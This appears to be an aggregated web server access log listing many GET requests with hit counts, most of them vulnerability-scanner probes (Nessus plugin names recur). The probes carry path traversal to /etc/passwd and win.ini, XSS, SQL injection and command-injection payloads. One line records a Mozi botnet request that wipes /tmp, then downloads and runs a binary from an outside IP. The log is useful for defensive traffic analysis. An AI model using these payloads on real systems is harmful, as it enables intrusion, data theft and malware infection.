1 GET /scripts/swc?ctr=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.1
1 GET /scripts/swr.jsp?q=%25\"<script>alert(1717627921)</script>&swrnum=1 HTTP/1.1
1 GET /scripts/sysinfo.cgi?action=systemdoc&name=sysinfo_name_cmd_exec.nasl;id HTTP/1.1
1 GET /scripts/test-cgi?* HTTP/1.0
1 GET /scripts/test.php HTTP/1.1
1 GET /scripts/tests/test_tools/selenium/core/SeleniumLog.html HTTP/1.1
1 GET /scripts/texis.cgi/KH9xMhOU-texis_path_disclosure HTTP/1.1
1 GET /scripts/texis.exe/?-dump HTTP/1.1
1 GET /scripts/texis.exe/KH9xMhOU-texis_path_disclosure HTTP/1.1
1 GET /scripts/texis/KH9xMhOU-texis_path_disclosure HTTP/1.1
1 GET /scripts/themes/program/themesettings.inc.php?themesdir=/etc/passwd%00 HTTP/1.1
4 GET /scripts/tiki-index.php HTTP/1.1
1 GET /scripts/tinfo.php?id=1717627944 HTTP/1.1
1 GET /scripts/tinybrowser/upload.php?badfiles=1><script>alert('tinybrowser_multiple_xss')</script> HTTP/1.1
1 GET /scripts/tinybrowser/upload.php?dupfiles=1><script>alert('tinybrowser_multiple_xss')</script> HTTP/1.1
1 GET /scripts/tinybrowser/upload.php?goodfiles=1><script>alert('tinybrowser_multiple_xss')</script> HTTP/1.1
1 GET /scripts/tomcat_proxy_directory_traversal.nasl1717627927 HTTP/1.1
1 GET /scripts/top.php?header=../../../../../../../../etc/passwd HTTP/1.1
1 GET /scripts/topic.php?tid='select HTTP/1.1
1 GET /scripts/tree.php HTTP/1.1
1 GET /scripts/tst.bat|type%20c:\\windows\\win.ini HTTP/1.1
1 GET /scripts/tst.bat|type%20c:\\winnt\\win.ini HTTP/1.1
1 GET /scripts/tsweb.asp HTTP/1.1
1 GET /scripts/tsweb/ HTTP/1.1
1 GET /scripts/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /scripts/ttx.cgi HTTP/1.1
1 GET /scripts/typo3/index.php HTTP/1.1
1 GET /scripts/ubbthreads.php HTTP/1.1
1 GET /scripts/update.php?op=info HTTP/1.1
1 GET /scripts/update.php HTTP/1.1
1 GET /scripts/upgrade/index.php HTTP/1.1
1 GET /scripts/upgradev1.php HTTP/1.1
1 GET /scripts/upload.cgi HTTP/1.1
1 GET /scripts/upload/upload-submit.do HTTP/1.1
1 GET /scripts/user.cgi?url=\">%3Cscript%3Ealert(\"gossamer_links_url_xss.nasl\")%3B%3C%2Fscript%3E&from=add HTTP/1.1
2 GET /scripts/user.php HTTP/1.1
1 GET /scripts/users/users.php HTTP/1.1
1 GET /scripts/usrdetails.php?sgnuptype=csaleID<script>nessus</script> HTTP/1.1
1 GET /scripts/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd HTTP/1.1
1 GET /scripts/vhost.php?action=logout&time=1717627690 HTTP/1.1
1 GET /scripts/viart_shop.xml HTTP/1.1
1 GET /scripts/view.php?PG=foobar HTTP/1.1
1 GET /scripts/view/System/WebHome?rev=1 HTTP/1.1
1 GET /scripts/view/TWiki/WebHome HTTP/1.1
1 GET /scripts/view_user.php?list=1&letter=&sort_by='select HTTP/1.1
1 GET /scripts/viewcvs.cgi/?cvsroot=<script>foo</script> HTTP/1.1
1 GET /scripts/viewcvs.cgi/ HTTP/1.1
1 GET /scripts/viewpage.php?file=/etc/passwd HTTP/1.1
1 GET /scripts/w3who.dll HTTP/1.1
2 GET /scripts/wa.cgi?DEBUG-SHOW-VERSION HTTP/1.1
2 GET /scripts/wa.exe?DEBUG-SHOW-VERSION HTTP/1.1
2 GET /scripts/wa?DEBUG-SHOW-VERSION HTTP/1.1
1 GET /scripts/way-board/way-board.cgi?db=/etc/passwd%00 HTTP/1.1
1 GET /scripts/wc.dll?wwMaint~EditConfig HTTP/1.1
1 GET /scripts/webadmin.php?show=%2Fetc%2Fpasswd HTTP/1.1
1 GET /scripts/webapp/home.html?0 HTTP/1.1
1 GET /scripts/webapp HTTP/1.1
1 GET /scripts/webappmon.exe?ins=nowait&act=natping&sel=%22255.255.255.255%20%26%20id%26%22 HTTP/1.1
1 GET /scripts/webboard/generate.cgi HTTP/1.1
1 GET /scripts/webc.cgi/ HTTP/1.1
1 GET /scripts/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;id|&CODE=PHOLD HTTP/1.1
1 GET /scripts/webdist.cgi?distloc=;id HTTP/1.1
1 GET /scripts/webglimpse.cgi HTTP/1.1
1 GET /scripts/webplus.exe?script=webplus_install_path.nasl HTTP/1.1
1 GET /scripts/webplus?script=/../../../../etc/passwd HTTP/1.1
1 GET /scripts/webspirs.cgi?sp.nextform=../../../../../../../../../etc/passwd HTTP/1.1
1 GET /scripts/webwho.pl HTTP/1.1
1 GET /scripts/welcome.php?custom_welcome_page=/etc/passwd%00 HTTP/1.1
1 GET /scripts/wgate/!?~urlmime=%22%3e%3cscript%3ealert%28%22sap_its_urlmime_xss.nasl%22%29%3c%2fscript%3e%3cimg%20src%3d%22 HTTP/1.1
1 GET /scripts/whois.cgi?action=load&whois=%3Bid HTTP/1.1
1 GET /scripts/whois.php?query=|id HTTP/1.1
2 GET /scripts/whois_raw.cgi?fqdn=%0Aid HTTP/1.1
1 GET /scripts/wihphoto/start.php HTTP/1.1
1 GET /scripts/wiki.php/<script>foo</script> HTTP/1.1
1 GET /scripts/wiki/edit.php?page=SandBox&suck_url=../kernel/config_inc.php&do_suck=h HTTP/1.1
1 GET /scripts/wiki/rankings.php HTTP/1.1
1 GET /scripts/wikka.php?wakka=HomePage/../../actions/wikkachanges HTTP/1.1
1 GET /scripts/wizard/index.php HTTP/1.1
1 GET /scripts/wordtrans.php?command=show_desc&advanced=1%22%3bid%3b%20true%20%22 HTTP/1.1
1 GET /scripts/wps_shop.cgi?action=showartikel&cat=nessus&catname=nessus&art=|id| HTTP/1.1
1 GET /scripts/wsasp.dll/WService=wsbroker1/webtools/oscommand.w HTTP/1.1
1 GET /scripts/wsasp.dll/WService=wsbroker1/webutil/ping.p HTTP/1.1
1 GET /scripts/wsisa.dll/WService=wsbroker1/webtools/oscommand.w HTTP/1.1
1 GET /scripts/wsisa.dll/WService=wsbroker1/webutil/ping.p HTTP/1.1
1 GET /scripts/wsnsa.dll/WService=wsbroker1/webtools/oscommand.w HTTP/1.1
1 GET /scripts/wsnsa.dll/WService=wsbroker1/webutil/ping.p HTTP/1.1
1 GET /scripts/wspd_cgi.sh/WService=wsbroker1/webtools/oscommand.w HTTP/1.1
1 GET /scripts/wspd_cgi.sh/WService=wsbroker1/webutil/ping.p HTTP/1.1
1 GET /scripts/www.83.118.68.34.bc.googleusercontent.com.7z HTTP/1.1
1 GET /scripts/www.83.118.68.34.bc.googleusercontent.com.Z HTTP/1.1
1 GET /scripts/www.83.118.68.34.bc.googleusercontent.com.bz2 HTTP/1.1
1 GET /scripts/www.83.118.68.34.bc.googleusercontent.com.gz HTTP/1.1
1 GET /scripts/www.83.118.68.34.bc.googleusercontent.com.jar HTTP/1.1
1 GET /scripts/www.83.118.68.34.bc.googleusercontent.com.rar HTTP/1.1
1 GET /scripts/www.83.118.68.34.bc.googleusercontent.com.tar.bz2 HTTP/1.1
1 GET /scripts/www.83.118.68.34.bc.googleusercontent.com.tar.gz HTTP/1.1
1 GET /scripts/www.83.118.68.34.bc.googleusercontent.com.tar HTTP/1.1
1 GET /scripts/www.83.118.68.34.bc.googleusercontent.com.tgz HTTP/1.1
1 GET /scripts/www.83.118.68.34.bc.googleusercontent.com.war HTTP/1.1
1 GET /scripts/www.83.118.68.34.bc.googleusercontent.com.z HTTP/1.1
1 GET /scripts/www.83.118.68.34.bc.googleusercontent.com.zip HTTP/1.1
1 GET /scripts/www.83.118.68.34.googleusercontent.7z HTTP/1.1
1 GET /scripts/www.83.118.68.34.googleusercontent.Z HTTP/1.1
1 GET /scripts/www.83.118.68.34.googleusercontent.bz2 HTTP/1.1
1 GET /scripts/www.83.118.68.34.googleusercontent.gz HTTP/1.1
1 GET /scripts/www.83.118.68.34.googleusercontent.jar HTTP/1.1
1 GET /scripts/www.83.118.68.34.googleusercontent.rar HTTP/1.1
1 GET /scripts/www.83.118.68.34.googleusercontent.tar.bz2 HTTP/1.1
1 GET /scripts/www.83.118.68.34.googleusercontent.tar.gz HTTP/1.1
1 GET /scripts/www.83.118.68.34.googleusercontent.tar HTTP/1.1
1 GET /scripts/www.83.118.68.34.googleusercontent.tgz HTTP/1.1
1 GET /scripts/www.83.118.68.34.googleusercontent.war HTTP/1.1
1 GET /scripts/www.83.118.68.34.googleusercontent.z HTTP/1.1
1 GET /scripts/www.83.118.68.34.googleusercontent.zip HTTP/1.1
1 GET /scripts/www/delivery/ac.php?bannerid=-1717627913+OR+1=1+--+';passthru(base64_decode($_SERVER[HTTP_NESSUS_DIJT554E]));die;/* HTTP/1.1
1 GET /scripts/www/delivery/ac.php?bannerid=-814+OR+1=1 HTTP/1.1
1 GET /scripts/www/delivery/fc.php?MAX_type=../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /scripts/wwwboard.html HTTP/1.1
1 GET /scripts/x_news.php HTTP/1.1
1 GET /scripts/xaradodb/server.php?sql='adodb_sql_sql_injection.nasl HTTP/1.1
1 GET /scripts/xaradodb/tests/tmssql.php?do=phpinfo HTTP/1.1
1 GET /scripts/zenworks/jsp/fw/internal/Login.jsp HTTP/1.1
1 GET /scripts/zml.cgi?file=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /scripts/zpanel.php?page=/etc/passwd%00 HTTP/1.1
3 GET /scripts HTTP/1.1
1 GET /scriptsadmin/index.php HTTP/1.1
1 GET /scriptsfaq.php?skin=../../admin/manager&tplpath=admin HTTP/1.1
1 GET /scriptsmultihtml.pl?multi=/etc/passwd%00html HTTP/1.1
1 GET /scriptssearch-results.dot?search_query=nessus%22%3e%3cscript%3ealert%28%27dotcms_search_query_xss.nasl%27%29%3c%2fscript%3e%2f HTTP/1.1
1 GET /scriptssearch_results.dot?search_query=nessus%22%3e%3cscript%3ealert%28%27dotcms_search_query_xss.nasl%27%29%3c%2fscript%3e%2f HTTP/1.1
2 GET /sdbsearch.cgi?stichwort=anything HTTP/1.1
1 GET /search-results.dot?search_query=nessus%22%3e%3cscript%3ealert%28%27dotcms_search_query_xss.nasl%27%29%3c%2fscript%3e%2f HTTP/1.1
1 GET /search-ui/ HTTP/1.1
1 GET /search.aspx HTTP/1.1
1 GET /search.cfm HTTP/1.1
1 GET /search.cgi?..\\..\\..\\..\\..\\..\\windows\\win.ini HTTP/1.1
1 GET /search.cgi?..\\..\\..\\..\\..\\..\\winnt\\win.ini HTTP/1.1
2 GET /search.cgi HTTP/1.1
1 GET /search.exe HTTP/1.1
1 GET /search.jsp?q=%25%22%3cscript%3ealert(1717627921)%3c/script%3e HTTP/1.1
1 GET /search.php?Submit=true&search='); HTTP/1.1
1 GET /search.php?allwords=<br><script>foo</script>&cid=0&title=1&desc=1 HTTP/1.1
3 GET /search.php HTTP/1.1
1 GET /search.pl?form=../../../../../../etc/passwd%00 HTTP/1.1
1 GET /search.pl HTTP/1.1
1 GET /search/ HTTP/1.1
1 GET /search/admin/index.php?cmd=login HTTP/1.1
1 GET /search/results.stm?indexname=>\"><script>foo</script>&style=fancy&spage=60&query=Folder%20name HTTP/1.1
1 GET /search/results.stm HTTP/1.1
1 GET /search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc HTTP/1.1
1 GET /search/search.cgi HTTP/1.1
1 GET /search/search.exe HTTP/1.1
1 GET /search/search.pl HTTP/1.1
1 GET /search/show.pl?url=file:/etc/passwd HTTP/1.1
1 GET /search/show.pl?url=http[:]//www[.]google[.]com HTTP/1.1
1 GET /search/webglimpse.cgi HTTP/1.1
1 GET /search97/ HTTP/1.1
1 GET /search=%3Cscript%3Ealert('XSS')%3C/script%3E HTTP/1.1
1 GET /search?NS-query-pat=../../../../../../../../../etc/passwd HTTP/1.1
1 GET /search?NS-query-pat=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini HTTP/1.1
1 GET /search_results.dot?search_query=nessus%22%3e%3cscript%3ealert%28%27dotcms_search_query_xss.nasl%27%29%3c%2fscript%3e%2f HTTP/1.1
2 GET /search HTTP/1.1
1 GET /secret/ HTTP/1.1
1 GET /secure.php?cfgProgDir=/etc/passwd%00 HTTP/1.1
1 GET /secure/ HTTP/1.1
1 GET /securecgi-bin/CSUserCGI.exe?Help+00[.]abcd[.]e[.]fghijk\"\"\"><script>alert(\"\"\"XSS\"\"\")</script> HTTP/1.1
1 GET /securecgi-bin/CSUserCGI.exe?Init+0 HTTP/1.1
1 GET /securecgi-bin/CSUserCGI.exe?ver HTTP/1.1
1 GET /secured/ HTTP/1.1
1 GET /securimage/captcha.html HTTP/1.1
1 GET /seditio/ HTTP/1.1
1 GET /seditio/index.php HTTP/1.1
1 GET /segue/ HTTP/1.1
1 GET /segue/themes/program/themesettings.inc.php?themesdir=/etc/passwd%00 HTTP/1.1
1 GET /seguecms/ HTTP/1.1
1 GET /seguecms/themes/program/themesettings.inc.php?themesdir=/etc/passwd%00 HTTP/1.1
1 GET /self_upgrade.html HTTP/1.1
1 GET /sell/ HTTP/1.1
1 GET /sendcard.php?view=1&id=%27sendcard_sql.nasl HTTP/1.1
1 GET /sendtemp.pl?templ=../../../../../etc/passwd HTTP/1.1
1 GET /serendipity/index.php HTTP/1.1
1 GET /serve/ HTTP/1.1
1 GET /server-info/ HTTP/1.1
2 GET /server-info HTTP/1.1
1 GET /server-manager/ HTTP/1.1
1 GET /server-status/ HTTP/1.1
2 GET /server-status HTTP/1.1
1 GET /server.pt?in_ra_groupoperator_1=and&in_hi_userid=1&in_hi_req_objtype=1&space=SearchResult&in_tx_fulltext=*&in_hi_groupoperator_1=and&parentid=1&in_hi_req_apps=1&cached=false&control=advancedstart&in_hi_revealed_1=0&in_hi_req_page=10&in_hi_depth_1=0&in_hi_totalgroups=1&parentname=AdvancedSearch&in_ra_topoperator=and HTTP/1.1
1 GET /server.pt?open=space&name=%22%3b%7d%3c%2fscript%3e%3cscript%3ealert%28%27plumtree_name_xss.nasl%27%29%3c%2fscript%3e HTTP/1.1
1 GET /server/s3_download.php HTTP/1.1
1 GET /server_stats/ HTTP/1.1
1 GET /servers/ HTTP/1.1
1 GET /serverstats/ HTTP/1.1
1 GET /service/ HTTP/1.1
2 GET /services/Walrus HTTP/1.1
1 GET /services/ HTTP/1.1
1 GET /services/help/?module=horde&show=about HTTP/1.1
1 GET /services/help/?module=horde&show=menu HTTP/1.1
1 GET /servicio/ HTTP/1.1
1 GET /servicios/ HTTP/1.1
1 GET /servlet/ContentServer HTTP/1.1
1 GET /servlet/SnoopServlet/ HTTP/1.1
1 GET /servlet/UDataArea?plugin=com.dell.oma.webplugins.AboutWebPlugin HTTP/1.1
1 GET /servlet/ HTTP/1.1
1 GET /servlet/admin?category=server&method=listAll&Authorization=Digest+username%3D%22admin%22%2C+response%3D%22ae9f86d6beaa3f9ecb9a5b7e072a4138%22%2C+nonce%3D%222b089ba7985a883ab2eddcd3539a6c94%22%2C+realm%3D%22adminRealm%22%2C+uri%3D%22%2Fservlet%2Fadmin%22&service= HTTP/1.0
1 GET /servlet/com.newatlanta.servletexec.JSP10Servlet/..%5c..%5cglobal.asa HTTP/1.1
1 GET /servlet/com.newatlanta.servletexec.JSP10Servlet HTTP/1.1
1 GET /servlet/snoop/ HTTP/1.1
1 GET /servlet/snoopservlet/ HTTP/1.1
1 GET /servlet/webacc?User.lang=<script>foo</script> HTTP/1.1
1 GET /servlet/webacc?error=webacc HTTP/1.1
2 GET /servlet/webacc HTTP/1.1
1 GET /servlets-examples/ HTTP/1.1
1 GET /servlets/ HTTP/1.1
1 GET /session/ HTTP/1.1
1 GET /session/login.php?dest=nessus%22%3e%3cscript%3ealert%28%27ossim_dest_xss.nasl%27%29%3c%2fscript%3e%3c%21--%20 HTTP/1.1
7 GET /session_login.cgi HTTP/1.1
1 GET /sessionmanager/ HTTP/1.1
1 GET /sessionmanager/index.php HTTP/1.1
1 GET /sessionmanager/login.jsp HTTP/1.1
1 GET /setcookie.php?u=../../../../../../../../../../../../etc/passwd%00&plugin=pblang_mult_flaws.nasl HTTP/1.1
1 GET /settings/site.ini HTTP/1.1
1 GET /setup.php HTTP/1.1
1 GET /setup/ HTTP/1.1
1 GET /setup/setup-/../../log.jsp?log=info&mode=asc&lines=10 HTTP/1.1
1 GET /setup HTTP/1.1
1 GET /sf/docman/new.php HTTP/1.1
1 GET /sf/patch/index.php HTTP/1.1
1 GET /sfa/control/checkLogin HTTP/1.1
1 GET /sfm/fm.php HTTP/1.1
1 GET /sgb/superguestconfig HTTP/1.1
1 GET /sgdadmin/faces/jsp/Version.jsp HTTP/1.1
1 GET /sgdynamo.exe?HTNAME=<script>foo</script> HTTP/1.1
1 GET /sgdynamo.exe?HTNAME=sgdynamo.exe HTTP/1.1
2 GET /sgms/login HTTP/1.1
1 GET /share/ HTTP/1.1
1 GET /shared/ HTTP/1.1
1 GET /shared/help.php?page=../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /shared/userlogin.php HTTP/1.1
1 GET /shell-cgi/ HTTP/1.1
1 GET /shell/sitecore.version.xml HTTP/1.1
1 GET /shell?cd+/tmp;rm+-rf+*;wget+http[:]//183[.]92[.]204[.]87:36834/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws HTTP/1.1
1 GET /shipping/ HTTP/1.1
1 GET /shop.plx/page=nessus494289675 HTTP/1.1
1 GET /shop.plx HTTP/1.1
2 GET /shop/ HTTP/1.1
1 GET /shop/admin.php?dpt=conf&sub=general HTTP/1.1
1 GET /shop/index.php HTTP/1.1
1 GET /shop/insertorder.cfm?CFID=1&CFTOKEN=1%20UNION%20SELECT%201%2c2%2c3%2c4%2cstorename%2c6%2c7%2c8%2c9%2c10%2c11%2c12%2c13%2c14%2c15%20from%20Params%22having%201%3d1 HTTP/1.1
1 GET /shop/normal_html.cgi?file=|id| HTTP/1.1
1 GET /shop/psunami.cgi?file=|id| HTTP/1.1
1 GET /shop/squirrelcart/cart_content.php?cart_isp_root=/etc/passwd%00 HTTP/1.1
1 GET /shop/viart_shop.xml HTTP/1.1
1 GET /shopaddtocart.asp?productid='42 HTTP/1.1
1 GET /shopexd.asp?catalogid='42 HTTP/1.1
1 GET /shopper.cgi?newpage=../../../../../../etc/passwd HTTP/1.1
1 GET /shopper/ HTTP/1.1
1 GET /shopping/ HTTP/1.1
1 GET /shopscript/ HTTP/1.1
1 GET /shopscript/admin.php?dpt=conf&sub=general HTTP/1.1
1 GET /shoutbox.php?conf=../../../../../../../../etc/passwd HTTP/1.1
1 GET /shoutbox.php?conf=../ HTTP/1.1
7 GET /show_bug.cgi HTTP/1.1
1 GET /showcat.php?cat=1' HTTP/1.1
1 GET /showproduct.php?product=1' HTTP/1.1
1 GET /shr-cgi-bin/ HTTP/1.1
1 GET /shr-cgi-bin/c32web.exe/GetImage?ImageName=cart32.ini%00.gif HTTP/1.1
1 GET /silverstripe/Security/login HTTP/1.1
1 GET /silverstripe/ HTTP/1.1
1 GET /simpgb/ HTTP/1.1
1 GET /simpgb/guestbook.php?lang=de&mode=new&quote=-1%20UNION%20SELECT%200,0,username,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20simpgb_users%20WHERE%201 HTTP/1.1
1 GET /simple/view_page?mv_arg=|cat%20/etc/passwd| HTTP/1.1
1 GET /simplebbs/ HTTP/1.1
1 GET /simplebbs/index.php HTTP/1.1
1 GET /simplesaml/ HTTP/1.1
1 GET /simplog/ HTTP/1.1
1 GET /simplog/doc/index.php?s=/etc/passwd%00 HTTP/1.1
1 GET /site/ HTTP/1.1
1 GET /site/admin/login/ HTTP/1.1
1 GET /site/index.php/admin/login/ HTTP/1.1
1 GET /site/index.php?action=view&module=resourcesmodule&id=0%20UNION%20SELECT%20-1%2c%27exponent_0964.nasl%27%2c%27Nessus%20test%27%2c%27O%3a8%3a%22stdClass%22%3a3%3a%7bs%3a3%3a%22mod%22%3bs%3a15%3a%22resourcesmodule%22%3bs%3a3%3a%22src%22%3bs%3a20%3a%22%40random41940ceb78dbb%22%3bs%3a3%3a%22int%22%3bs%3a0%3a%22%22%3b%7d%27%2c7%2c0%2c0%2c0%2c0%2c0%2c0%20-- HTTP/1.1
1 GET /site/index.php?src=1&_common=1&time=1717627958&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /site/typo3/index.php HTTP/1.1
1 GET /site/wiki/edit.php?page=SandBox&suck_url=../kernel/config_inc.php&do_suck=h HTTP/1.1
1 GET /site/wiki/rankings.php HTTP/1.1
1 GET /site_sift/ HTTP/1.1
1 GET /site_sift/index.php?go=detail&id=-99999/**/UNION/**/SELECT/**/0,1,concat(1717627930,0x3a,494874244),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 HTTP/1.1
1 GET /site_sift/index.php?go=detail&id=-99999/**/UNION/**/SELECT/**/0,1,concat(1717627930,0x3a,494874244),3,4,5,6,7,8,9,10,11,12,13,14,15,16 HTTP/1.1
1 GET /siteadmin/ HTTP/1.1
1 GET /sitebuilder/ HTTP/1.1
1 GET /sitebuilder/admin/top.php?admindir=/etc/passwd%00 HTTP/1.1
1 GET /sitebuildercontent/ HTTP/1.1
1 GET /sitebuilderfiles/ HTTP/1.1
1 GET /sitebuilderpictures/ HTTP/1.1
1 GET /sitecore/login/Default.aspx HTTP/1.1
1 GET /sitecore/login/default.aspx HTTP/1.1
1 GET /sitecore/shell/sitecore.version.xml HTTP/1.1
1 GET /siteframe.php?LOCAL_PATH=/etc/passwd%00 HTTP/1.1
1 GET /siteframe.php?LOCAL_PATH=macros/100-siteframe.macro%00 HTTP/1.1
3 GET /sitemap.xml HTTP/1.1
1 GET /sitemgr/ HTTP/1.1
1 GET /siteminder/ HTTP/1.1
1 GET /siteminderagent/ HTTP/1.1
1 GET /sites/ HTTP/1.1
1 GET /siteserver/ HTTP/1.1
1 GET /sitesift/ HTTP/1.1
1 GET /sitesift/index.php?go=detail&id=-99999/**/UNION/**/SELECT/**/0,1,concat(1717627930,0x3a,494874244),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 HTTP/1.1
1 GET /sitesift/index.php?go=detail&id=-99999/**/UNION/**/SELECT/**/0,1,concat(1717627930,0x3a,494874244),3,4,5,6,7,8,9,10,11,12,13,14,15,16 HTTP/1.1
1 GET /sitestats/ HTTP/1.1
1 GET /siteupdate/ HTTP/1.1
1 GET /sitex/photo.php?albumid=-557'%20UNION%20SELECT%201,concat(0x73,0x69,0x74,0x65,0x78,0x5f,0x61,0x6c,0x62,0x75,0x6d,0x69,0x64,0x5f,0x73,0x71,0x6c,0x69,0x2e,0x6e,0x61,0x73,0x6c),3,4,5,6,7,8%20--%20' HTTP/1.1
1 GET /slide/ HTTP/1.1
1 GET /sm/ HTTP/1.1
1 GET /sm/index.do HTTP/1.1
1 GET /sm/src/login.php HTTP/1.1
1 GET /sm HTTP/1.1
1 GET /smadmr5.nsf HTTP/1.1
1 GET /smartermail/ HTTP/1.1
1 GET /smb2www.pl HTTP/1.1
1 GET /smconf.nsf HTTP/1.1
1 GET /smency.nsf HTTP/1.1
1 GET /smf/ HTTP/1.1
1 GET /smf/index.php HTTP/1.1
1 GET /smftypes.nsf HTTP/1.1
1 GET /smhelp.nsf HTTP/1.1
1 GET /smmsg.nsf HTTP/1.1
1 GET /smpwservicescgi.exe HTTP/1.1
1 GET /smquar.nsf HTTP/1.1
1 GET /smreports/ HTTP/1.1
1 GET /smreportsviewer/ HTTP/1.1
1 GET /smsmvlog.nsf HTTP/1.1
1 GET /smtime.nsf HTTP/1.1
1 GET /smweb/index.do HTTP/1.1
1 GET /snitz/ HTTP/1.1
1 GET /snmx-cgi/ HTTP/1.1
1 GET /snmx-cgi/fxm.exe HTTP/1.1
1 GET /snoop/ HTTP/1.1
1 GET /snoopservlet/ HTTP/1.1
1 GET /snort/nmap.php?target=|id HTTP/1.1
1 GET /snortreport-1.3.1/nmap.php?target=|id HTTP/1.1
1 GET /snortreport/nmap.php?target=|id HTTP/1.1
1 GET /snpfiltered.pl?t=c&u=<script>foo</script> HTTP/1.1
1 GET /soap/ HTTP/1.1
1 GET /soapdocs/ HTTP/1.1
1 GET /socialengine/ HTTP/1.1
1 GET /socialengine/browse_blogs.php HTTP/1.1
1 GET /socialnetwork/ HTTP/1.1
1 GET /socialnetwork/browse_blogs.php HTTP/1.1
1 GET /software/ HTTP/1.1
1 GET /sojourn.cgi?cat=../../../../../etc/passwd%00 HTTP/1.1
1 GET /solaris/ HTTP/1.1
1 GET /solr/# HTTP/1.1
1 GET /solutions/ HTTP/1.1
1 GET /someunexistantantsutff.exe HTTP/1.1
1 GET /someunexistantantsutff1649320816927370230.html HTTP/1.1
1 GET /source/ HTTP/1.1
1 GET /source?v=../../../../../../../../../../etc/passwd%00 HTTP/1.1
1 GET /sources/functions.php?root_path=/etc/passwd%00 HTTP/1.1
1 GET /spaw/dialogs/confirm.php?spaw_root=/etc/passwd%00 HTTP/1.1
1 GET /sphider/ HTTP/1.1
1 GET /sphider/admin/configset.php?settings_dir=/etc/passwd%00 HTTP/1.1
1 GET /sphpblog/ HTTP/1.1
1 GET /sphpblog/login.php HTTP/1.1
1 GET /spip/ HTTP/1.1
1 GET /spip/forum.php3?id_article=1&id_forum=-1/**/UNION/**/SELECT%201085192369-- HTTP/1.1
1 GET /spip/forum.php?id_article=1&id_forum=-1/**/UNION/**/SELECT%201004522983-- HTTP/1.1
1 GET /spotfire/about.jsp HTTP/1.1
1 GET /spree/api/orders.json?search[instance_eval]=Kernel.fail%20%60id%60 HTTP/1.1
1 GET /spt/SPT--ForumTopics.php?forumid=-9%20UNION%20SELECT%20null%2cnull%2cnull%2c1717627929%2c4%2c5 HTTP/1.1
1 GET /spt/ HTTP/1.1
1 GET /spywall/login.php HTTP/1.1
1 GET /sql-ledger/ HTTP/1.1
1 GET /sql-ledger/admin.pl?path=bin/mozilla&action=list_users HTTP/1.1
1 GET /sql-ledger/am.pl?path=bin/mozilla&action=display_form&file=users/etc/passwd&login=root+login HTTP/1.1
1 GET /sql-ledger/login.pl?login=ledgersmb_script_code_exec.nasl&script=-e%20print%20%22Content-Type%3a%20text%2fplain%0d%0a%0d%0a%22%3bsystem%28id%29&action=logout HTTP/1.1
1 GET /sql-ledger/login.pl HTTP/1.1
1 GET /sql.php3?LIB_INC=1&btnDrop=No&goto=/etc/passwd HTTP/1.1
1 GET /sql.php?LIB_INC=1&btnDrop=No&goto=/etc/passwd HTTP/1.1
1 GET /sql/ HTTP/1.1
1 GET /sql/install-0.9.7.php?p=2 HTTP/1.1
1 GET /sqlite/ HTTP/1.1
1 GET /sqlite/spaw/dialogs/confirm.php?spaw_root=/etc/passwd%00 HTTP/1.1
1 GET /sqlitemanager/ HTTP/1.1
1 GET /sqlitemanager/index.php HTTP/1.1
1 GET /sqlitemanager/spaw/dialogs/confirm.php?spaw_root=/etc/passwd%00 HTTP/1.1
1 GET /squid/ HTTP/1.1
1 GET /squirrelcart/ HTTP/1.1
1 GET /squirrelcart/cart_content.php?cart_isp_root=/etc/passwd%00 HTTP/1.1
1 GET /squirrelcart/squirrelcart/cart_content.php?cart_isp_root=/etc/passwd%00 HTTP/1.1
1 GET /squirrelmail/ HTTP/1.1
1 GET /squirrelmail/src/login.php HTTP/1.1
1 GET /sqwebmail?redirect=%0d%0a%0d%0asqwebmail_http_splitting.nasl HTTP/1.1
1 GET /src/ HTTP/1.1
1 GET /src/login.php HTTP/1.1
1 GET /src/redirect.php HTTP/1.1
1 GET /srchadm/ HTTP/1.1
1 GET /ssb/index.php HTTP/1.1
1 GET /ssi/ HTTP/1.1
1 GET /ssi/envout.bat?|type%20c:\\windows\\win.ini HTTP/1.1
1 GET /ssi/envout.bat?|type%20c:\\winnt\\win.ini HTTP/1.1
1 GET /ssl/ HTTP/1.1
1 GET /sslkeys/ HTTP/1.1
1 GET /ssp// HTTP/1.1
1 GET /staff/ HTTP/1.1
1 GET /staging/welcome.action HTTP/1.1
1 GET /starnet/addons/slideshow_full.php?album_name=%271347125759 HTTP/1.1
1 GET /starnet/modules/include/include.php?cmsdir=/etc/passwd%00 HTTP/1.1
1 GET /starnet/modules/sn_allbum/slideshow.php?cmsdir=/etc/passwd%00 HTTP/1.1
1 GET /starnet/themes/editable/main.inc.php?cmsdir=/etc/passwd%00 HTTP/1.1
1 GET /start.action HTTP/1.1
1 GET /start.js HTTP/1.1
1 GET /stat/ HTTP/1.1
1 GET /statistic/ HTTP/1.1
